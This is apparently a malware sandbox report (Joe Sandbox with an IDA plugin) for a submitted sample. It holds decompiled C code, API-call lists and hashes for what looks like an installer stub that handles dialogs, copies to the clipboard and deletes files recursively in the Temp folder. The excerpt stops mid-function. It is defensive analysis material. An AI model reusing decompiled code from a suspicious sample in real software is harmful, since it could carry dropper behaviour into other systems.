                                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                      				}
                                                                                      				if(_a12 >= _t156) {
                                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      				_push(0x1b);
                                                                                      				E00404499(_a4);
                                                                                      				if(( *0x434f18 & 0x00000003) != 0) {
                                                                                      					ShowWindow( *0x433ed0, _t156);
                                                                                      					if(( *0x434f18 & 0x00000002) != 0) {
                                                                                      						 *0x433ed0 = _t156;
                                                                                      					} else {
                                                                                      						ShowWindow(_v8, 8);
                                                                                      					}
                                                                                      					E004044CE( *0x433ec8);
                                                                                      				}
                                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                      				if(( *0x434f18 & 0x00000004) != 0) {
                                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                      				}
                                                                                      				goto L36;
                                                                                      			}



































                                                                                      0x00405712
                                                                                      0x00405715
                                                                                      0x00405718
                                                                                      0x0040571b
                                                                                      0x0040571c
                                                                                      0x0040571d
                                                                                      0x00405736
                                                                                      0x00405739
                                                                                      0x00405743
                                                                                      0x00405752
                                                                                      0x0040575a
                                                                                      0x00405762
                                                                                      0x00405767
                                                                                      0x0040576a
                                                                                      0x00405776
                                                                                      0x0040577f
                                                                                      0x00405788
                                                                                      0x004057aa
                                                                                      0x004057b0
                                                                                      0x004057c1
                                                                                      0x004057c6
                                                                                      0x004057d4
                                                                                      0x004057e2
                                                                                      0x004057e2
                                                                                      0x004057e7
                                                                                      0x004057f5
                                                                                      0x004057f5
                                                                                      0x004057fa
                                                                                      0x004057fd
                                                                                      0x00405802
                                                                                      0x0040580e
                                                                                      0x00405817
                                                                                      0x00405824
                                                                                      0x00405833
                                                                                      0x00405826
                                                                                      0x0040582b
                                                                                      0x0040582b
                                                                                      0x0040583f
                                                                                      0x0040583f
                                                                                      0x00405853
                                                                                      0x0040585c
                                                                                      0x00405865
                                                                                      0x00405875
                                                                                      0x00405881
                                                                                      0x00405881
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                      • GetClientRect.USER32(?,?), ref: 00405788
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                        • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                      • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                      • ShowWindow.USER32(00000008), ref: 00405926
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                      • CreatePopupMenu.USER32 ref: 0040596B
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                      • EmptyClipboard.USER32 ref: 00405A06
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                      • CloseClipboard.USER32 ref: 00405A61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {
                                                                                      • API String ID: 590372296-366298937
                                                                                      • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                      • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                      • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                      • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 457 405cc1-405cc2 call 405e58 449->457 458 405cb4-405cbf lstrcatW 449->458 450->447 453 405dba-405dbd 450->453 451->449 451->450 455 405dc7-405dcf call 406873 453->455 456 405dbf-405dc5 453->456 455->447 466 405dd1-405de5 call 405e0c call 405c01 455->466 456->447 461 405cc7-405ccb 457->461 458->461 462 405cd7-405cdd lstrcatW 461->462 463 405ccd-405cd5 461->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->456 488 405dec-405dfb call 40559f call 4062fd 482->488 483->447 484->475 489 405d4c-405d55 call 405c49 484->489 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 488->447 489->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                                                                      C-Code - Quality: 98%
                                                                                      			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				short _v556;
                                                                                      				short _v558;
                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                      				signed int _t38;
                                                                                      				signed int _t52;
                                                                                      				signed int _t55;
                                                                                      				signed int _t62;
                                                                                      				void* _t64;
                                                                                      				signed char _t65;
                                                                                      				WCHAR* _t66;
                                                                                      				void* _t67;
                                                                                      				WCHAR* _t68;
                                                                                      				void* _t70;
                                                                                      
                                                                                      				_t65 = _a8;
                                                                                      				_t68 = _a4;
                                                                                      				_v8 = _t65 & 0x00000004;
                                                                                      				_t38 = E00405F14(__eflags, _t68);
                                                                                      				_v12 = _t38;
                                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                                      					_t62 = DeleteFileW(_t68); // executed
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t64 =  ~_t62 + 1;
                                                                                      					 *0x434f88 =  *0x434f88 + _t64;
                                                                                      					return _t64;
                                                                                      				}
                                                                                      				_a4 = _t65;
                                                                                      				_t8 =  &_a4;
                                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                                      				__eflags =  *_t8;
                                                                                      				if( *_t8 == 0) {
                                                                                      					L5:
                                                                                      					E0040653D(0x42f270, _t68);
                                                                                      					__eflags = _a4;
                                                                                      					if(_a4 == 0) {
                                                                                      						E00405E58(_t68);
                                                                                      					} else {
                                                                                      						lstrcatW(0x42f270, L"\\*.*");
                                                                                      					}
                                                                                      					__eflags =  *_t68;
                                                                                      					if( *_t68 != 0) {
                                                                                      						L10:
                                                                                      						lstrcatW(_t68, 0x40a014);
                                                                                      						L11:
                                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                      						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
                                                                                      						_t70 = _t38;
                                                                                      						__eflags = _t70 - 0xffffffff;
                                                                                      						if(_t70 == 0xffffffff) {
                                                                                      							L26:
                                                                                      							__eflags = _a4;
                                                                                      							if(_a4 != 0) {
                                                                                      								_t30 = _t66 - 2;
                                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                      								__eflags =  *_t30;
                                                                                      							}
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						do {
                                                                                      							L12:
                                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                                      							if(_v604.cFileName != 0x2e) {
                                                                                      								L16:
                                                                                      								E0040653D(_t66,  &(_v604.cFileName));
                                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                                      									__eflags = _t52;
                                                                                      									if(_t52 != 0) {
                                                                                      										E0040559F(0xfffffff2, _t68);
                                                                                      									} else {
                                                                                      										__eflags = _v8 - _t52;
                                                                                      										if(_v8 == _t52) {
                                                                                      											 *0x434f88 =  *0x434f88 + 1;
                                                                                      										} else {
                                                                                      											E0040559F(0xfffffff1, _t68);
                                                                                      											E004062FD(_t67, _t68, 0);
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                                      									if(__eflags == 0) {
                                                                                      										E00405C49(__eflags, _t68, _a8);
                                                                                      									}
                                                                                      								}
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558;
                                                                                      							if(_v558 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558 - 0x2e;
                                                                                      							if(_v558 != 0x2e) {
                                                                                      								goto L16;
                                                                                      							}
                                                                                      							__eflags = _v556;
                                                                                      							if(_v556 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							goto L16;
                                                                                      							L24:
                                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                      							__eflags = _t55;
                                                                                      						} while (_t55 != 0);
                                                                                      						_t38 = FindClose(_t70);
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					__eflags =  *0x42f270 - 0x5c;
                                                                                      					if( *0x42f270 != 0x5c) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					__eflags = _t38;
                                                                                      					if(_t38 == 0) {
                                                                                      						L28:
                                                                                      						__eflags = _a4;
                                                                                      						if(_a4 == 0) {
                                                                                      							L36:
                                                                                      							return _t38;
                                                                                      						}
                                                                                      						__eflags = _v12;
                                                                                      						if(_v12 != 0) {
                                                                                      							_t38 = E00406873(_t68);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 == 0) {
                                                                                      								goto L36;
                                                                                      							}
                                                                                      							E00405E0C(_t68);
                                                                                      							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 != 0) {
                                                                                      								return E0040559F(0xffffffe5, _t68);
                                                                                      							}
                                                                                      							__eflags = _v8;
                                                                                      							if(_v8 == 0) {
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							E0040559F(0xfffffff1, _t68);
                                                                                      							return E004062FD(_t67, _t68, 0);
                                                                                      						}
                                                                                      						L30:
                                                                                      						 *0x434f88 =  *0x434f88 + 1;
                                                                                      						return _t38;
                                                                                      					}
                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                                      						goto L28;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      			}



















                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Borders.dat,\*.*), ref: 00405CBA
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                      • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Borders.dat$\*.*
                                                                                      • API String ID: 2035342205-804058615
                                                                                      • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                      • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                      • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                      • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 95%
                                                                                      			E71031BFF() {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				WCHAR* _v24;
                                                                                      				WCHAR* _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				WCHAR* _v48;
                                                                                      				signed int _v52;
                                                                                      				void* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				WCHAR* _t208;
                                                                                      				signed int _t211;
                                                                                      				void* _t213;
                                                                                      				void* _t215;
                                                                                      				WCHAR* _t217;
                                                                                      				void* _t225;
                                                                                      				struct HINSTANCE__* _t226;
                                                                                      				struct HINSTANCE__* _t227;
                                                                                      				struct HINSTANCE__* _t229;
                                                                                      				signed short _t231;
                                                                                      				struct HINSTANCE__* _t234;
                                                                                      				struct HINSTANCE__* _t236;
                                                                                      				void* _t237;
                                                                                      				intOrPtr* _t238;
                                                                                      				void* _t249;
                                                                                      				signed char _t250;
                                                                                      				signed int _t251;
                                                                                      				void* _t255;
                                                                                      				struct HINSTANCE__* _t257;
                                                                                      				void* _t258;
                                                                                      				signed int _t260;
                                                                                      				signed int _t261;
                                                                                      				signed short* _t264;
                                                                                      				signed int _t269;
                                                                                      				signed int _t272;
                                                                                      				signed int _t274;
                                                                                      				void* _t277;
                                                                                      				void* _t281;
                                                                                      				struct HINSTANCE__* _t283;
                                                                                      				signed int _t286;
                                                                                      				void _t287;
                                                                                      				signed int _t288;
                                                                                      				signed int _t300;
                                                                                      				signed int _t301;
                                                                                      				signed short _t304;
                                                                                      				void* _t305;
                                                                                      				signed int _t309;
                                                                                      				signed int _t312;
                                                                                      				signed int _t315;
                                                                                      				signed int _t316;
                                                                                      				signed int _t317;
                                                                                      				signed short* _t321;
                                                                                      				WCHAR* _t322;
                                                                                      				WCHAR* _t324;
                                                                                      				WCHAR* _t325;
                                                                                      				struct HINSTANCE__* _t326;
                                                                                      				void* _t328;
                                                                                      				signed int _t331;
                                                                                      				void* _t332;
                                                                                      
                                                                                      				_t283 = 0;
                                                                                      				_v32 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v16 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_t332 = 0;
                                                                                      				_v52 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_t208 = E710312BB();
                                                                                      				_v24 = _t208;
                                                                                      				_v28 = _t208;
                                                                                      				_v48 = E710312BB();
                                                                                      				_t321 = E710312E3();
                                                                                      				_v56 = _t321;
                                                                                      				_v12 = _t321;
                                                                                      				while(1) {
                                                                                      					_t211 = _v32;
                                                                                      					_v60 = _t211;
                                                                                      					if(_t211 != _t283 && _t332 == _t283) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t286 =  *_t321 & 0x0000ffff;
                                                                                      					_t213 = _t286 - _t283;
                                                                                      					if(_t213 == 0) {
                                                                                      						_t37 =  &_v32;
                                                                                      						 *_t37 = _v32 | 0xffffffff;
                                                                                      						__eflags =  *_t37;
                                                                                      						L20:
                                                                                      						_t215 = _v60 - _t283;
                                                                                      						if(_t215 == 0) {
                                                                                      							__eflags = _t332 - _t283;
                                                                                      							 *_v28 = _t283;
                                                                                      							if(_t332 == _t283) {
                                                                                      								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                                      								_t332 = _t255;
                                                                                      								 *(_t332 + 0x1010) = _t283;
                                                                                      								 *(_t332 + 0x1014) = _t283;
                                                                                      							}
                                                                                      							_t287 = _v36;
                                                                                      							_t47 = _t332 + 8; // 0x8
                                                                                      							_t217 = _t47;
                                                                                      							_t48 = _t332 + 0x808; // 0x808
                                                                                      							_t322 = _t48;
                                                                                      							 *_t332 = _t287;
                                                                                      							_t288 = _t287 - _t283;
                                                                                      							__eflags = _t288;
                                                                                      							 *_t217 = _t283;
                                                                                      							 *_t322 = _t283;
                                                                                      							 *(_t332 + 0x1008) = _t283;
                                                                                      							 *(_t332 + 0x100c) = _t283;
                                                                                      							 *(_t332 + 4) = _t283;
                                                                                      							if(_t288 == 0) {
                                                                                      								__eflags = _v28 - _v24;
                                                                                      								if(_v28 == _v24) {
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t328 = 0;
                                                                                      								GlobalFree(_t332);
                                                                                      								_t332 = E710313B1(_v24);
                                                                                      								__eflags = _t332 - _t283;
                                                                                      								if(_t332 == _t283) {
                                                                                      									goto L42;
                                                                                      								} else {
                                                                                      									goto L35;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L35:
                                                                                      									_t249 =  *(_t332 + 0x1ca0);
                                                                                      									__eflags = _t249 - _t283;
                                                                                      									if(_t249 == _t283) {
                                                                                      										break;
                                                                                      									}
                                                                                      									_t328 = _t332;
                                                                                      									_t332 = _t249;
                                                                                      									__eflags = _t332 - _t283;
                                                                                      									if(_t332 != _t283) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									break;
                                                                                      								}
                                                                                      								__eflags = _t328 - _t283;
                                                                                      								if(_t328 != _t283) {
                                                                                      									 *(_t328 + 0x1ca0) = _t283;
                                                                                      								}
                                                                                      								_t250 =  *(_t332 + 0x1010);
                                                                                      								__eflags = _t250 & 0x00000008;
                                                                                      								if((_t250 & 0x00000008) == 0) {
                                                                                      									_t251 = _t250 | 0x00000002;
                                                                                      									__eflags = _t251;
                                                                                      									 *(_t332 + 0x1010) = _t251;
                                                                                      								} else {
                                                                                      									_t332 = E7103162F(_t332);
                                                                                      									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                      								}
                                                                                      								goto L42;
                                                                                      							} else {
                                                                                      								_t300 = _t288 - 1;
                                                                                      								__eflags = _t300;
                                                                                      								if(_t300 == 0) {
                                                                                      									L31:
                                                                                      									lstrcpyW(_t217, _v48);
                                                                                      									L32:
                                                                                      									lstrcpyW(_t322, _v24);
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t301 = _t300 - 1;
                                                                                      								__eflags = _t301;
                                                                                      								if(_t301 == 0) {
                                                                                      									goto L32;
                                                                                      								}
                                                                                      								__eflags = _t301 != 1;
                                                                                      								if(_t301 != 1) {
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								goto L31;
                                                                                      							}
                                                                                      						} else {
                                                                                      							if(_t215 == 1) {
                                                                                      								_t257 = _v16;
                                                                                      								if(_v40 == _t283) {
                                                                                      									_t257 = _t257 - 1;
                                                                                      								}
                                                                                      								 *(_t332 + 0x1014) = _t257;
                                                                                      							}
                                                                                      							L42:
                                                                                      							_v12 = _v12 + 2;
                                                                                      							_v28 = _v24;
                                                                                      							L59:
                                                                                      							if(_v32 != 0xffffffff) {
                                                                                      								_t321 = _v12;
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      					}
                                                                                      					_t258 = _t213 - 0x23;
                                                                                      					if(_t258 == 0) {
                                                                                      						__eflags = _t321 - _v56;
                                                                                      						if(_t321 <= _v56) {
                                                                                      							L17:
                                                                                      							__eflags = _v44 - _t283;
                                                                                      							if(_v44 != _t283) {
                                                                                      								L43:
                                                                                      								_t260 = _v32 - _t283;
                                                                                      								__eflags = _t260;
                                                                                      								if(_t260 == 0) {
                                                                                      									_t261 = _t286;
                                                                                      									while(1) {
                                                                                      										__eflags = _t261 - 0x22;
                                                                                      										if(_t261 != 0x22) {
                                                                                      											break;
                                                                                      										}
                                                                                      										_t321 =  &(_t321[1]);
                                                                                      										__eflags = _v44 - _t283;
                                                                                      										_v12 = _t321;
                                                                                      										if(_v44 == _t283) {
                                                                                      											_v44 = 1;
                                                                                      											L162:
                                                                                      											_v28 =  &(_v28[0]);
                                                                                      											 *_v28 =  *_t321;
                                                                                      											L58:
                                                                                      											_t331 =  &(_t321[1]);
                                                                                      											__eflags = _t331;
                                                                                      											_v12 = _t331;
                                                                                      											goto L59;
                                                                                      										}
                                                                                      										_t261 =  *_t321 & 0x0000ffff;
                                                                                      										_v44 = _t283;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x2a;
                                                                                      									if(_t261 == 0x2a) {
                                                                                      										_v36 = 2;
                                                                                      										L57:
                                                                                      										_t321 = _v12;
                                                                                      										_v28 = _v24;
                                                                                      										_t283 = 0;
                                                                                      										__eflags = 0;
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x2d;
                                                                                      									if(_t261 == 0x2d) {
                                                                                      										L151:
                                                                                      										_t304 =  *_t321;
                                                                                      										__eflags = _t304 - 0x2d;
                                                                                      										if(_t304 != 0x2d) {
                                                                                      											L154:
                                                                                      											_t264 =  &(_t321[1]);
                                                                                      											__eflags =  *_t264 - 0x3a;
                                                                                      											if( *_t264 != 0x3a) {
                                                                                      												goto L162;
                                                                                      											}
                                                                                      											__eflags = _t304 - 0x2d;
                                                                                      											if(_t304 == 0x2d) {
                                                                                      												goto L162;
                                                                                      											}
                                                                                      											_v36 = 1;
                                                                                      											L157:
                                                                                      											_v12 = _t264;
                                                                                      											__eflags = _v28 - _v24;
                                                                                      											if(_v28 <= _v24) {
                                                                                      												 *_v48 = _t283;
                                                                                      											} else {
                                                                                      												 *_v28 = _t283;
                                                                                      												lstrcpyW(_v48, _v24);
                                                                                      											}
                                                                                      											goto L57;
                                                                                      										}
                                                                                      										_t264 =  &(_t321[1]);
                                                                                      										__eflags =  *_t264 - 0x3e;
                                                                                      										if( *_t264 != 0x3e) {
                                                                                      											goto L154;
                                                                                      										}
                                                                                      										_v36 = 3;
                                                                                      										goto L157;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x3a;
                                                                                      									if(_t261 != 0x3a) {
                                                                                      										goto L162;
                                                                                      									}
                                                                                      									goto L151;
                                                                                      								}
                                                                                      								_t269 = _t260 - 1;
                                                                                      								__eflags = _t269;
                                                                                      								if(_t269 == 0) {
                                                                                      									L80:
                                                                                      									_t305 = _t286 + 0xffffffde;
                                                                                      									__eflags = _t305 - 0x55;
                                                                                      									if(_t305 > 0x55) {
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(( *(_t305 + 0x710323e8) & 0x000000ff) * 4 +  &M7103235C))) {
                                                                                      										case 0:
                                                                                      											__ecx = _v24;
                                                                                      											__edi = _v12;
                                                                                      											while(1) {
                                                                                      												__edi = __edi + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												_v12 = __edi;
                                                                                      												__ax =  *__edi;
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax != __dx) {
                                                                                      													goto L132;
                                                                                      												}
                                                                                      												L131:
                                                                                      												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                      												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                      													L136:
                                                                                      													 *__ecx =  *__ecx & 0x00000000;
                                                                                      													__eax = E710312CC(_v24);
                                                                                      													__ebx = __eax;
                                                                                      													goto L97;
                                                                                      												}
                                                                                      												L132:
                                                                                      												__eflags = __ax;
                                                                                      												if(__ax == 0) {
                                                                                      													goto L136;
                                                                                      												}
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax == __dx) {
                                                                                      													__edi = __edi + 1;
                                                                                      													__edi = __edi + 1;
                                                                                      													__eflags = __edi;
                                                                                      												}
                                                                                      												__ax =  *__edi;
                                                                                      												 *__ecx =  *__edi;
                                                                                      												__ecx = __ecx + 1;
                                                                                      												__ecx = __ecx + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												_v12 = __edi;
                                                                                      												__ax =  *__edi;
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax != __dx) {
                                                                                      													goto L132;
                                                                                      												}
                                                                                      												goto L131;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											_v8 = 1;
                                                                                      											goto L57;
                                                                                      										case 2:
